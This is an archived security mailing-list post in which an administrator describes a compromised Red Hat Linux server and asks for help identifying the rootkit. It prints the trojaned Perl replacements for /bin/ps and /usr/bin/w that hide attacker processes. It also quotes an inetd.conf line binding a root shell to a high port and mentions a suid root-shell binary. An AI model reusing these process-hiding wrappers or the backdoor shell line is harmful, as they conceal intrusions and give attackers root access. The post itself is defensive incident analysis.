hi
i found today something funny happening when i tried to install a web
server
on a customer's machine:
1. w - returned some weird "/usr/bin/perl" processes
2. ps - was not showing everything
3. two connections to some irc servers; fuser - finding the process id's
for
them, but ps not showing them
some infos about the server (unfortunately it wasnt installed by me...):
[root@www root]# uname -a
Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
the future too, lol)
[root@www /root]# cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)
more digging... so i found some modified files:
[root@www nouser]# ls -l /bin/ps
-rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps
[root@www /root]# cat /bin/ps
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
print "$ps";
[root@www /root]# ls -l /usr/lib/libxnotps
-r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps
[root@www nouser]# ls -l /usr/bin/w
-rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w
[root@www /root]# cat /usr/bin/w
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
print "$w";
[root@www /root]# ls -l /usr/lib/libxyotps
-r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps
there is another file called /usr/lib/libxzotps, but i couldnt find what is
pointing at that, yet
no reference found on the web, searching for "libxnotps" or "libxnotps" or
"libxzotps"
[root@www nouser]# grep nouser /etc/passwd
nouser:x:502:502::/sbin/nouser:/bin/bash
[root@www nouser]# ls -l /sbin/nouser
total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23 packet0r.pl
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war
of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots
i have scanned the machine using chkroot kit... the only funny thing found
was an inetd.conf, containing:
[root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh
of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i cant find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit anyway... but i
want to be sure no other major changes were made... before i install the
production server there.
thanks for any comments
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Mar 10 2002 - 17:10:24 PST